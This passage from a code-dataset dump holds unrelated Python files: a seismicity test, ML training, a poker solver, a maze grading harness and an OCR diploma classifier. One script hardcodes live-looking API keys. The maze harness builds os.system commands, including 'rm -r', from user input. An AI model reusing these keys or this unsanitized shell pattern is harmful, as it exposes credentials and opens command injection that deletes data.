tdsr.loading import StepLoading\nfrom tdsr.utils import Eq7\n\n\ndef plot_fig4ab(\n out,\n t,\n t0,\n tstart,\n tend,\n sstep,\n strend,\n cfs,\n cf_shad,\n r_tdsr,\n r_lcm,\n r_rsd,\n R_TDSR_theory,\n chi0,\n depthS,\n):\n # make a bigger global font size and sans-serif style\n plt.rc(\"font\", family=\"sans-serif\")\n plt.rc(\"font\", size=12)\n plt.rc(\"legend\", fontsize=10)\n fig, ax = plt.subplots(2, 1, figsize=(7, 6))\n plt.subplots_adjust(hspace=0.0)\n\n al = (0.8, 0.2)\n good = t > 0.0\n for i, Sstep in enumerate(sstep):\n ax[0].plot(t, cf_shad[i, :], c=\"k\", ls=\"solid\", lw=1.5, alpha=al[i])\n ax[0].plot(\n t,\n cfs[i, :],\n c=\"k\",\n 
ls=\"solid\",\n lw=2,\n alpha=al[i],\n label=r\"$\\Delta\\sigma_c / \\delta\\sigma$=%.1f\" % (Sstep),\n )\n\n ax[0].axhline(0, c=\"gray\", ls=\"dotted\", lw=1)\n ax[0].set_xticks([])\n ax[0].set_xlim(tstart, tend)\n ax[0].set_ylim(-5, 1.1 * (strend * tend))\n ax[0].set_ylabel(r\"$\\sigma_c(t) - \\sigma_c(0)$\")\n ax[0].legend()\n ax[0].text(\n -0.18,\n 0.93,\n \"(a)\",\n fontsize=14,\n color=\"k\",\n horizontalalignment=\"left\",\n transform=ax[0].transAxes,\n )\n\n for i, Sstep in enumerate(sstep):\n if i == 0:\n ax[1].plot(\n t, r_tdsr[i, :], c=\"b\", ls=\"solid\", lw=3, alpha=al[i], label=\"TDSR, RS\"\n )\n ax[1].plot(\n t, r_lcm[i, :], c=\"g\", ls=\"dashed\", lw=1, alpha=al[i], label=\"CF\"\n )\n else:\n ax[1].plot(t, r_tdsr[i, :], c=\"b\", ls=\"solid\", lw=3, alpha=al[i])\n ax[1].plot(t, r_lcm[i, :], c=\"g\", ls=\"dashed\", lw=1, alpha=al[i])\n ax[1].plot(t[good], R_TDSR_theory[i, good], c=\"r\", ls=\"dashed\", lw=1)\n\n ax[1].set_xlim(tstart, tend)\n ax[1].set_ylim(0, 1.1 * chi0 * strend)\n ax[1].set_xlabel(r\"Time $t$ / ($\\delta\\sigma / \\dot\\sigma_c$)\")\n ax[1].set_ylabel(\"Seismicity rate $R$ / $r_0$\")\n ax[1].legend()\n ax[1].text(\n -0.18,\n 0.93,\n \"(b)\",\n fontsize=14,\n color=\"k\",\n horizontalalignment=\"left\",\n transform=ax[1].transAxes,\n )\n\n fig.savefig(str(out) + \".pdf\", format=\"pdf\", dpi=300, bbox_inches=\"tight\")\n fig.savefig(str(out) + \".png\", format=\"png\", dpi=300, bbox_inches=\"tight\")\n\n\ndef test_fig4ab():\n tdsr = TDSR1()\n cfm = CFM()\n rsd = RSD()\n\n # time unit\n hours = 1.0\n # (=-dsig) skin depth in MPa\n # must be negative, will be changed with next release\n depthS = -1.0\n # mean failure time in sec for critically stressed source t0 = 1.0\n # (=dotsigc) in MPa/timeunit: tectonic stressing rate before loading\n strend = 1.0\n # susceptibility to trigger critically stressed sources\n # if a unit step increas is applied (r0 = chi0*strend)\n chi0 = 1.0\n\n # stress steps applied at time tstep, in MPa\n # formerly Sstepvalues = (-2.0, -4.0)\n sstep = [\n -2.0,\n -4.0,\n ]\n tstep = 0.0 * hours\n tstep = 0.01 * hours\n\n # simulation start\n tstart = -1.0 * hours\n # simulation end\n tend = 10.0 * hours\n\n deltat = 0.02 * hours\n t0 = deltat\n # =NT = len(t)\n nt = int(np.ceil((tend - tstart) / deltat))\n\n # linear time axis\n taxis_log = False\n\n # discretizing stress axis for integration\n # increment do discretize Coulomb stress axis\n deltaS = -depthS / 60.0\n # maximum depth on Coulomb axis (limit of integral)\n sigma_max = 3000.0 * deltaS\n\n # calculare earthquake rates\n cfs = np.zeros((2, nt))\n cf_shad = np.zeros((2, nt))\n r_tdsr = np.zeros((2, nt))\n r_lcm = np.zeros((2, nt))\n r_rsd = np.zeros((2, nt))\n R_TDSR_theory = np.zeros((2, nt))\n\n # calculate equilibrium distribution of tectonic loading,\n # to be used later to avoid initial oscillations\n # loading = BackgroundLoading(strend=strend)\n # t, chiz_background, cf, r, xn = tdsm(\n # loading=loading, chi0=chi0, depthS=depthS, deltaS=deltaS,\n # sigma_max=sigma_max, deltat=deltat, tstart=0, tend=tend)\n\n for i, Sstep in enumerate(sstep):\n loading = StepLoading(\n strend=strend,\n sstep=Sstep,\n tstep=tstep,\n taxis_log=taxis_log,\n deltat=deltat,\n tstart=tstart,\n tend=tend,\n )\n common = dict(\n loading=loading,\n chi0=chi0,\n t0=t0,\n depthS=depthS,\n deltaS=deltaS,\n sigma_max=sigma_max,\n iX0=\"equilibrium\",\n deltat=deltat,\n taxis_log=taxis_log,\n tstart=tstart,\n tend=tend,\n )\n\n t, chiz, cf, r, xn = tdsr(**common)\n cfs[i, :] = cf[:]\n r_tdsr[i, :] = 
r[:]\n\n # BUG: cf_shadow is written here, but cf_shad is plotted (zeros only)!\n t, cf_shadow, cf, r, xn = rsd(**common)\n r_rsd[i, :] = r\n\n t, chiz, cf, r, xn = cfm(**common)\n r_lcm[i, :] = r\n\n R_TDSR_theory[i, :] = Eq7(t, sstep[i], chi0 * strend, -depthS, strend, strend)\n\n test_name = inspect.currentframe().f_code.co_name\n\n # plot values\n plot_fig4ab(\n out=PLOT_DIR / test_name,\n t=t,\n t0=t0,\n tstart=tstart,\n tend=tend,\n sstep=sstep,\n strend=strend,\n cfs=cfs,\n cf_shad=cf_shad,\n r_tdsr=r_tdsr,\n r_lcm=r_lcm,\n r_rsd=r_rsd,\n R_TDSR_theory=R_TDSR_theory,\n chi0=chi0,\n depthS=depthS,\n )\n\n # dump values\n values = dict(\n cfs=cfs,\n cf_shad=cf_shad,\n r_tdsr=r_tdsr,\n r_lcm=r_lcm,\n r_rsd=r_rsd,\n R_TDSR_theory=R_TDSR_theory,\n )\n dump_values(key=test_name, values=values, overwrite=False)\n\n # assert correct values\n values = load_values(key=test_name)\n assert np.allclose(values[\"cfs\"], cfs)\n assert np.allclose(values[\"cf_shad\"], cf_shad)\n assert np.allclose(values[\"r_tdsr\"], r_tdsr)\n assert np.allclose(values[\"r_lcm\"], r_lcm)\n assert np.allclose(values[\"r_rsd\"], r_rsd)\n assert np.allclose(values[\"R_TDSR_theory\"], R_TDSR_theory)\n","repo_name":"torstendahm/tdsr","sub_path":"tests/test_fig4ab.py","file_name":"test_fig4ab.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13542377777","text":"import torch\nimport json\nfrom pathlib import Path\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../\"))\nfrom constants import DIALOGUE_ANNOTATOR_DATASETS_DIR, DIALOGUE_ANNOTATOR_PRETRAIN_DATA_DIR, BERT_PRETRAINED_MODEL, \\\n DIALOGUE_EXPERIMENTS_DIR, MAX_SENTIMENT_SEQ_LENGTH\nfrom Dialogue_Annotator.pipeline.bert_classifier import DebiasedBertPretrainedClassifier, LightningHyperparameters\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping\n\nfrom argparse import ArgumentParser\nfrom utils import init_logger\nfrom Sentiment_Adjectives.pipeline.predict import predict_models, print_final_metrics\n\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n### Constants\nBATCH_SIZE = 16\n# BATCH_SIZE = 8\nACCUMULATE = 1\nDROPOUT = 0.1\nEPOCHS = 50\n# EPOCHS = 1\nFP16 = False\n\n\ndef downstream_task_finetuning_phase2(args):\n data_file = args.pregenerated_data / f\"{BERT_PRETRAINED_MODEL}_epoch_0.json\"\n metrics_file = args.pregenerated_data / f\"{BERT_PRETRAINED_MODEL}_epoch_0_metrics.json\"\n assert data_file.is_file() and metrics_file.is_file()\n metrics = json.loads(metrics_file.read_text())\n num_samples = metrics['num_training_examples']\n\n hparams = {\n \"data_path\": DIALOGUE_ANNOTATOR_DATASETS_DIR,\n \"dataset\": args.dataset,\n \"treatment\": \"DST\",\n \"masking_method\": args.masking_method,\n \"pretrain_control\": args.pretrained_control,\n \"text_column\": \"dialogue_history\",\n \"label_column\": \"ent_labels\",\n \"batch_size\": args.batch_size,\n \"epochs\": args.epochs,\n \"accumulate\": ACCUMULATE,\n \"num_training_examples\": num_samples,\n \"max_seq_len\": MAX_SENTIMENT_SEQ_LENGTH,\n \"name\": f\"Entity_Prediction\",\n \"ckpt_path\": f\"/Users/shiquan/PycharmProjects/deBiasing-Dialogue/Dialogue_Annotator/pipeline/entity-prediction-models-from-scratch/entity-prediction_ckpt_epoch_1.ckpt\",\n \"bert_params\": {\n \"dropout\": DROPOUT,\n \"bert_state_dict\": None,\n \"name\": f\"Entity_Prediction\"\n }\n }\n\n print(f\"Training 
{hparams['name']} models\")\n\n if hparams[\"bert_params\"][\"bert_state_dict\"]:\n if args.pretrained_control:\n hparams[\"bert_params\"][\"name\"] = f\"Entity_Prediction_DST_UI_Treated\"\n else:\n hparams[\"bert_params\"][\"name\"] = f\"Entity_Prediction_DST_Treated\"\n else:\n hparams[\"bert_params\"][\"name\"] = f\"Entity_Prediction\"\n\n OUTPUT_DIR = f\"{DIALOGUE_EXPERIMENTS_DIR}/{hparams['treatment']}/{hparams['bert_params']['name']}\"\n checkpoint_callback = ModelCheckpoint(\n monitor='val_accuracy',\n filepath='entity-prediction-phase2-models',\n prefix='entity-prediction',\n mode='max',\n save_best_only=False\n )\n early_stopping_callback = EarlyStopping('val_accuracy', patience=5, mode='max')\n trainer = Trainer(gpus=1 if DEVICE.type == \"cuda\" else 0,\n default_save_path=OUTPUT_DIR,\n show_progress_bar=True,\n accumulate_grad_batches=hparams[\"accumulate\"],\n max_nb_epochs=hparams[\"epochs\"],\n early_stop_callback=early_stopping_callback,\n checkpoint_callback=checkpoint_callback)\n hparams['output_path'] = trainer.logger.experiment.log_dir.rstrip('tf')\n logger = init_logger(\"training\", hparams['output_path'])\n logger.info(f\"Training Entity_Prediction for {hparams['epochs']} epochs\")\n hparams[\"bert_params\"][\"batch_size\"] = hparams[\"batch_size\"]\n model = DebiasedBertPretrainedClassifier(LightningHyperparameters(hparams))\n trainer.fit(model)\n trainer.test()\n print_final_metrics(hparams[\"bert_params\"][\"name\"], trainer.tqdm_metrics, logger)\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--pregenerated_data', type=Path, required=False)\n parser.add_argument(\"--dataset\", type=str, default=\"multiwoz\", choices=(\"multiwoz\",\"sgd\"),\n help=\"Specify dataset for experiments\")\n parser.add_argument(\"--group\", type=str, default=\"F\", choices=(\"F\", \"CF\"),\n help=\"Specify data group for experiments: F (factual) or CF (counterfactual)\")\n parser.add_argument(\"--masking_method\", type=str, default=\"mlm_prob\", choices=(\"double_num_adj\", \"mlm_prob\"),\n help=\"Method of determining num masked tokens in sentence\")\n parser.add_argument(\"--pretrained_epoch\", type=int, default=0,\n help=\"Specify epoch for pretrained models: 0-4\")\n parser.add_argument(\"--pretrained_control\", action=\"store_true\",\n help=\"Use pretraining model with control task\")\n parser.add_argument(\"--batch_size\", type=int, default=BATCH_SIZE,\n help=\"Batch size for training\")\n parser.add_argument(\"--epochs\", type=int, default=EPOCHS,\n help=\"Number of epochs to train for\")\n args = parser.parse_args()\n\n args.pregenerated_data = Path(DIALOGUE_ANNOTATOR_PRETRAIN_DATA_DIR) / args.masking_method\n\n downstream_task_finetuning_phase2(args)\n\n\nif __name__ == '__main__':\n main()","repo_name":"shiquanyang/Robust-Dialogue","sub_path":"pipeline/training_phase2.py","file_name":"training_phase2.py","file_ext":"py","file_size_in_byte":5213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36243449002","text":"import requests\r\nimport json\r\nimport datetime\r\nimport hashlib\r\n\r\ndef get_time_stamp():\r\n\treturn datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n\r\n\r\napi_key = \"0GVM6gyA-GbCfp7dSg1YDixAw0Pu51ECtPRxdH_k7wFXKz66U9sYox2XKlVtEZH1\"\r\napi_key2 = \"_tHUemb1Kr-E36Hhv7ToGC1RyTjkmatfWA6nUADrC1vYnwIY6G_-z7NjeOefrgpZ\"\r\nsensor_id = \"test\"\r\nsensor_id2 = \"OUjb9xP5fYH32qbW\"\r\ntime_stamp = get_time_stamp()\r\n\r\nheader = {\"content-type\": 
\"application/json\"}\r\n\r\ntest_data = {\"type\": \"test\", \"values\": {\"Test Value\": {\"value\": 64, \"max\": 100, \"type\": \"test\"}}}\r\ntest_data2 = {\"type\": \"test\", \"values\": {\r\n\t\"Charger 1\": {\"value\": 42, \"max\": 100, \"type\": \"test\"},\r\n\t\"Charger 2\": {\"value\": 25, \"max\": 100, \"type\": \"test\"},\r\n\t\"Charger 3\": {\"value\": 2, \"max\": 100, \"type\": \"test\"}\r\n}}\r\n\r\nrequest_json = {\r\n\t\t\t\t\"sensor_id\": sensor_id,\r\n\t\t\t\t\"time_stamp\": str(time_stamp),\r\n\t\t\t\t\"verification\": hashlib.sha256(str(time_stamp + api_key).encode()).hexdigest(),\r\n\t\t\t\t\"data\": test_data\r\n\t\t\t\t}\r\n\r\n# Making a PUT request\r\nr = requests.put('http://larby.co.uk/sensor-api/update/', data=json.dumps(request_json), headers=header)\r\n\r\n# check status code for response received\r\n# success code - 200\r\nprint(r)\r\n\r\n# print content of request\r\nprint(r.content)","repo_name":"mattl1598/project-cherry-pi","sub_path":"api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40508651130","text":"from collections import Counter\n\n\ndef compute(path: str) -> int:\n def is_flush(suits: list[str, ...]) -> bool:\n return len(set(suits)) == 1\n\n def is_royal(values: list[str, ...]) -> bool:\n return sum(values) == 50\n\n def is_consecutive(values: list[str, ...], hand_value: int) -> bool:\n return sum(values) == 5 * (hand_value - 2)\n\n def get_rank_value(counted_values: Counter) -> int:\n return max(value for value, kinds in counted_values.items() if kinds == max(counted_values.values()))\n\n def get_rank(cards: list[str, ...]) -> (str, int, int):\n values, suits = [card_ranks[card[0]] for card in cards], [card[1] for card in cards]\n counted_values, hand_value = Counter(values), max(values)\n unique_values = len(counted_values)\n if unique_values == 5:\n if is_flush(suits):\n if is_consecutive(values, hand_value):\n rank = 'Royal Flush' if is_royal(values) else 'Straight Flush'\n else:\n rank = 'Flush'\n elif is_consecutive(values, hand_value):\n rank = 'Straight'\n else:\n rank = 'High Card'\n rank_value = hand_value\n else:\n if unique_values == 4:\n rank = 'One Pair'\n elif unique_values == 3:\n rank = 'Three of a Kind' if max(counted_values.values()) == 3 else 'Two Pairs'\n else:\n rank = 'Four of a Kind' if max(counted_values.values()) == 4 else 'Full House'\n rank_value = get_rank_value(counted_values)\n return rank, rank_value, hand_value\n\n def is_winner(hands: list[str, ...]) -> bool:\n player_1, player_2 = map(get_rank, [hands[:5], hands[5:]])\n if hand_ranks[player_1[0]] > hand_ranks[player_2[0]]:\n return True\n elif hand_ranks[player_1[0]] == hand_ranks[player_2[0]]:\n if player_1[1] > player_2[1]:\n return True\n elif player_1[1] == player_2[1]:\n return player_1[2] > player_2[2]\n return False\n\n hand_ranks = {hand: rank for rank, hand in enumerate(['High Card', 'One Pair', 'Two Pairs', 'Three of a Kind',\n 'Straight', 'Flush', 'Full House', 'Four of a Kind',\n 'Straight Flush', 'Royal Flush'])}\n card_ranks = {card: rank for rank, card in enumerate(['2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K',\n 'A'])}\n return sum(map(is_winner, [i.split(' ') for i in 
open(path).read().split('\\n')]))\n","repo_name":"Dynortice/Project-Euler","sub_path":"problems/0054/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26650204220","text":"from PIL import Image\n\n\ndef to_rgb(path, to_color: tuple[int, int, int], save_path):\n final_color = [val/256 for val in to_color]\n image: Image.Image = Image.open(path).convert(\"L\")\n new_image = Image.new(\"RGBA\", image.size)\n for y in range(image.height):\n for x in range(image.width):\n pixel = image.getpixel((x, y))\n vals = tuple(int(val*pixel) for val in final_color)+(255, )\n if vals == (0, 0, 0, 255):\n vals = (*to_color, 100)\n new_image.putpixel((x, y), vals)\n new_image.save(save_path)\n\n\nif __name__ == '__main__':\n for name in [\"spruce\"]:\n path = f\"src/leaves/{name}_leaves.png\"\n save_path = f\"../src/blocks/vegetation/leaves/{name}_leaves.png\"\n to_rgb(path, (0, 100, 0), save_path)\n","repo_name":"AlphaNow37/PyCraft","sub_path":"creator_tools/to_RGB_img.py","file_name":"to_RGB_img.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"9814629402","text":"#coding=utf-8\n#Written by Ricky Qi and Xin Li for COMP9021 Assignment 2\n\n\nfrom random import seed, choice, randint\nimport os\nimport sys\nimport difflib\nimport argparse\n\ndef readfile(filename):\n try:\n with open(filename, 'r') as fileHandle:\n text = fileHandle.read().splitlines()\n return text\n except IOError as e:\n print(\"Read file Error:\", e)\n sys.exit()\n\narg_for_seed = input('Please input a seed:')\nfile_name = input('Please input the name of file that you want to create to store txt and tex files: ').split()\nfile_name = '_'.join(file_name)\nprint(file_name)\nprint(\"检测并移除冲突文件夹\")\nos.system(f'rm -r {file_name}')\nos.mkdir(file_name)\nos.mkdir(file_name + '/tex')\n\ntimes = int(input('How many maze TXT do you want to generate?: '))\n\n#Written by Ricky Qi and Xin Li for COMP9021 Assignment 2\nall_blocks = ('0', '1', '2', '3')\nright_blocks = ('0', '2')\nbottom_blocks = ('0', '1')\nseed(arg_for_seed)\n\nfor i in range(times):\n#Written by Ricky Qi and Xin Li for COMP9021 Assignment 2\n num_of_rows = randint(2, 41)\n num_of_cols = randint(2, 31)\n with open(f'{file_name}/{file_name}_{i}.txt', 'w') as f:\n for row in range(num_of_rows - 1):\n for col in range(num_of_cols - 1):\n f.write(choice(all_blocks))\n f.write(choice(right_blocks) + '\\n')\n for col in range(num_of_cols - 1):\n f.write(choice(bottom_blocks))\n f.write('0')\n#Written by Ricky Qi and Xin Li for COMP9021 Assignment 2\nprint(f'txt documents have already out put to {file_name}')\nERR = []\nthe_analyse = []\na_err = []\nfor i in range(times):\n command = f'python3 -c \"from maze import *;maze = Maze(\\'{file_name}/{file_name}_{i}.txt\\');maze.display()\"'\n os.system(command)\n\n\n print(f\"正在处理... 
{file_name}_{i}.tex\")\n    print(\"The tex file has been generated, starting comparison...\")\n    temp = os.popen(f'diff {file_name}/{file_name}_{i}.tex {file_name}_test/{file_name}_test_{i}.tex')\n    info = temp.readlines()\n    if len(info) != 0:\n        print(f\"The files differ; details stored in {file_name}_report.txt\")\n        ERR.append(f\"Mismatched file: {file_name}_{i}.tex\")\n        for line in info:\n            print(line.strip())\n            ERR.append(line.strip())\n    else:\n        print(\"No differences, Pass\")\nos.system(f'rm {file_name}_report.txt')\nprint(\"Generating the display() error log...\")\nwith open(f'{file_name}_display_report.txt', 'w') as f:\n    for e in ERR:\n        print(e, file = f)\n\n# Written by Ricky and Xin Li for COMP9021 Assignment 2\n\nprint(\"Starting tests of the analyse module\")\n\n\nfor i in range(times):\n    command1 = f'python3 -c \"from maze import *;maze = Maze(\\'{file_name}/{file_name}_{i}.txt\\');maze.analyse()\"'\n    analyse = os.popen(command1)\n    info_analyse = analyse.readlines()\n    the_analyse.append(f'{file_name}_{i}.txt')\n    print(f'Processing {file_name}_{i}.txt...')\n    for line1 in info_analyse:\n        the_analyse.append(line1.strip())\n\nprint(f\"Dumping analyse() output to {file_name}_analyse.txt...\")\nwith open(f'{file_name}_analyse.txt', 'w') as f1:\n    for x in the_analyse:\n        print(x, file = f1)\n\ntext1 = readfile(f'{file_name}_analyse.txt')\ntext2 = readfile(f'{file_name}_test_analyse.txt')\nd = difflib.HtmlDiff()\nresult = d.make_file(text1, text2, f'{file_name}_analyse.txt', f'{file_name}_test_analyse.txt', context=True)\n\nwith open(f'{file_name}_analyse_report.html', 'w') as resultfile:\n    resultfile.write(result)\n\n\n# Written by Ricky and Xin Li for COMP9021 Assignment 2\n","repo_name":"Jerenyaoyelu/Python-Programming---COMP9021","sub_path":"Assignment/2/P1/auto 2/maze_generator.py","file_name":"maze_generator.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"23652272025","text":"import pygame\nfrom pygame.sprite import Sprite\nclass Ship(Sprite):\n    def __init__(self):\n        super().__init__()\n        '''initialization of remaining lives image'''\n        self.image = pygame.image.load('images/shipBlack2.bmp')\n        self.image.set_colorkey((0, 0, 0))\n        self.rect = self.image.get_rect() \n\n    \n    \n    \n    \n","repo_name":"jimbojimih/Aliens-Invasion-with-mods","sub_path":"shipleft.py","file_name":"shipleft.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12064082715","text":"import os\nimport sys\nimport numpy as np\nimport soundfile as sf\nimport librosa\n\ndataset_path = sys.argv[1]\npresenter_name = sys.argv[2]\ntoken = sys.argv[3]\n\nobj_path = os.path.join(dataset_path, presenter_name)\nROOT = os.path.join(obj_path, f\"output_{token}\")\nprint(\"ROOT:\", ROOT)\nstart = 0\nend = -1\n\nwith open(os.path.join(obj_path, f\"filelist_{token}/raw_filelist.txt\"), \"r\") as f:\n    data = f.readlines()\n\ndata = [line.strip() for line in data]\ndata.sort()\ndata = data[start:]\nprint(\"Data\", start, len(data), len(data))\n\nerrors = []\nresults = []\nfor p in data:\n    try:\n        d = os.path.join(ROOT, p)\n        frames = os.listdir(d)\n        frames = [file for file in frames if \".jpg\" in file]\n        frame_count = len(frames)\n        vid_duration = frame_count/25\n        # print(vid_duration)\n        vid_name = d.split(\"/\")[-1]\n\n        org_path = os.path.join(d, f\"{vid_name}.wav\")\n        au_path = os.path.join(d, \"audio.wav\")\n        synced_path = os.path.join(d, \"synced_audio.wav\")\n\n        if not os.path.isfile(au_path):\n            status = os.system(f\"ffmpeg -i {org_path} -ar 16000 {au_path}\")\n            if 
status != 0:\n errors.append(p)\n continue\n if os.path.isfile(synced_path):\n continue\n\n au, sr = librosa.load(au_path, sr=16000)\n au_duration = au.shape[0]/sr\n\n extra = int(vid_duration * sr - au.shape[0])\n is_append = extra >= 0\n extra = abs(extra)\n new_au = au\n if extra > 0:\n front = False\n if (is_append):\n # append audio\n if front:\n new_au = np.concatenate([np.zeros(extra), au])\n else:\n new_au = np.concatenate([au, np.zeros(extra)])\n else:\n # cut audio\n if front:\n new_au = au[:-extra]\n else:\n new_au = au[extra:]\n sf.write(synced_path, new_au, sr)\n results.append(p)\n except Exception:\n print(p)\n errors.append(p)\nif not os.path.exists(os.path.join(obj_path, f\"filelist_{token}/temp\")):\n os.mkdir(os.path.join(obj_path, f\"filelist_{token}/temp\"))\n\nwith open(os.path.join(obj_path, f\"filelist_{token}/temp/output_synced_{start}_{len(data)}.txt\"), \"w\") as f:\n for line in results:\n f.write(line + \"\\n\")\n\nwith open(os.path.join(obj_path, f\"filelist_{token}/temp/output_synced_errors_{start}_{len(data)}.txt\"), \"w\") as f:\n for line in errors:\n f.write(line + \"\\n\")","repo_name":"nghiakvnvsd/wav2lip_data_preprocessing","sub_path":"6_au_sync.py","file_name":"6_au_sync.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"25801207943","text":"def toys(w):\n \"\"\"Hackerrank Problem: https://www.hackerrank.com/challenges/priyanka-and-toys/problem\n\n Priyanka works for an international toy company that ships by container. Her task is to the determine the lowest\n cost way to combine her orders for shipping. She has a list of item weights. The shipping company has a requirement\n that all items loaded in a container must weigh less than or equal to 4 units plus the weight of the minimum weight\n item. All items meeting that requirement will be shipped in one container.\n\n Solve:\n We sort the array, and then we iterate through the list seeing if each order fits within the current lowest order's\n weight. 
If it does, we can continue on, and if it doesn't, we then create a new \"container\" as this order no\n    longer fits within the previous order limit, and continue on through the orders.\n\n    Args:\n        w (list): Array representing the weighted orders\n\n    Returns:\n        int: The minimum number of containers needed to ship the orders\n    \"\"\"\n    containers = 1\n    w.sort()\n    cur_lowest = w[0]\n    # Iterate through the sorted list, and add a container if the next weighted order doesn't fit within the current\n    # lowest order's weight + 4\n    for i in range(1, len(w)):\n        if w[i] > cur_lowest + 4:\n            cur_lowest = w[i]\n            containers += 1\n    return containers\n\n\nif __name__ == \"__main__\":\n    print(toys([1, 2, 3, 21, 7, 12, 14, 21]))\n","repo_name":"kcc3/hackerrank-solutions","sub_path":"problem_solving/python/algorithms/greedy/priyanka_and_toys.py","file_name":"priyanka_and_toys.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5031193478","text":"\r\n#from tensorflow import keras\r\nimport cv2\r\nimport numpy as np \r\nimport os\r\n\r\n\r\n# from loss import*\r\n# from func import*\r\n\r\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"subtle-fulcrum-319206-415ab8f59c71.json\"\r\nfrom google.cloud import vision\r\nclient = vision.ImageAnnotatorClient()\r\nimport jieba\r\nimport re\r\n\r\nfolderlist = []\r\n\r\nfolderpath = './classify'\r\npath = './image'\r\n\r\nschool = ['大學','高中','國中','國小','二專','四技','學校','私立','公立']\r\n\r\n\r\n\r\nclass diplomaClassifier():\r\n    def __init__(self):\r\n        #self.cutModel = keras.models.load_model('unet_diploma_4.hdf5')\r\n        #self.stampModel = keras.models.load_model('unet_stamp_rgb_300_15_binary.hdf5',custom_objects={'dice_coef_loss': dice_coef_loss})\r\n        #self.stampModel = keras.models.load_model('unet_stamp_4.hdf5')\r\n        self.text =[]\r\n        self.tempSchool =''\r\n\r\n    def run(self,file):\r\n        self.img = cv2.imread('{}/{}'.format(path,file))\r\n        \r\n        #self.img = cv2.imread('./{}'.format(file))\r\n\r\n        \r\n\r\n        \"\"\"Detects text in the file.\"\"\"\r\n        tempImg = self.img\r\n        \r\n        file = re.sub(r'\\.jpg$', '', file)  # strip only the trailing extension, not every '.', 'j', 'p', 'g'\r\n\r\n        # encode the image for transmission\r\n        success, encoded_image = cv2.imencode('.jpg', self.img)\r\n        content = encoded_image.tobytes()\r\n\r\n        # Call API\r\n        image = vision.Image(content=content)\r\n        response = client.text_detection(image=image)\r\n        \r\n        texts = response.text_annotations\r\n\r\n        # no words were detected\r\n        if len(texts) == 0:\r\n            \r\n            print('NO text')\r\n            os.makedirs('./{}/unsorted/{}'.format(folderpath,file))\r\n            cv2.imwrite('{}/unsorted/{}/{}.jpg'.format(folderpath,file,file),tempImg)\r\n            \r\n            return 0\r\n\r\n        text = texts[0].description\r\n        text = text.replace(\"\\n\",\" \").strip()\r\n\r\n        jieba.load_userdict('./jiabaDictionary/school.txt')\r\n        seg_list = jieba.cut(text)\r\n        \r\n        for i in seg_list:\r\n            if i ==' ':\r\n                continue\r\n            self.text.append(i)\r\n        print(self.text)\r\n        buffer = []\r\n        for c in school:\r\n            for i in self.text: \r\n                if c in i:\r\n                    buffer.append(i)\r\n        \r\n        print(buffer)\r\n\r\n        # no school-related words were detected\r\n        if len(buffer) == 0:\r\n            print('{}/unsorted/{}/{}.jpg'.format(folderpath,file,file))\r\n            os.makedirs('./{}/unsorted/{}'.format(folderpath,file))\r\n            cv2.imwrite('{}/unsorted/{}/{}.jpg'.format(folderpath,file,file),tempImg)\r\n            return 0\r\n        \r\n        if len(buffer) != 0:\r\n            for i in buffer:\r\n                if len(self.tempSchool) < len(i):\r\n                    self.tempSchool = i\r\n            \r\n            if len(self.tempSchool) < 4:\r\n                print('school: Not Found')\r\n\r\n                
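# no school name could be recognized with confidence, so file the image under 'unsorted'\r\n                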
os.makedirs('./{}/unsorted/{}'.format(folderpath,file))\r\n                cv2.imwrite('{}/unsorted/{}/{}.jpg'.format(folderpath,file,file),tempImg)\r\n            \r\n            else:\r\n                \r\n                if self.tempSchool not in folderlist:\r\n                    os.makedirs('./{}/{}'.format(folderpath,self.tempSchool))\r\n                    folderlist.append(self.tempSchool)\r\n                \r\n                print('School: ',self.tempSchool)\r\n\r\n                # cv2.imwrite cannot handle Chinese paths, so encode the image and write it with tofile\r\n                cv2.imencode('.jpg',tempImg)[1].tofile('classify/{}/{}.jpg'.format(self.tempSchool,file)) \r\n\r\n        \r\n\r\n\r\nif __name__ == '__main__':\r\n    classifiler = diplomaClassifier()\r\n\r\n    path = './image'\r\n    filelist = os.listdir(path)\r\n\r\n    jieba.case_sensitive = True\r\n    classifiler.run('152.jpg')\r\n    # for file in filelist:\r\n    #     #print(file)\r\n    #     classifiler.img = cv2.imread('{}/{}'.format(path,file))\r\n    #     classifiler.run(file)\r\n\r\n","repo_name":"ke511081177/StudentCard_Classification","sub_path":"SCClassifier.py","file_name":"SCClassifier.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25356166352","text":"import random\ndef noReplacementSimulation(numTrials):\n    '''\n    Runs numTrials trials of a Monte Carlo simulation\n    of drawing 3 balls out of a bucket containing\n    3 red and 3 green balls. Balls are not replaced once\n    drawn. Returns a decimal - the fraction of times 3 \n    balls of the same color were drawn.\n    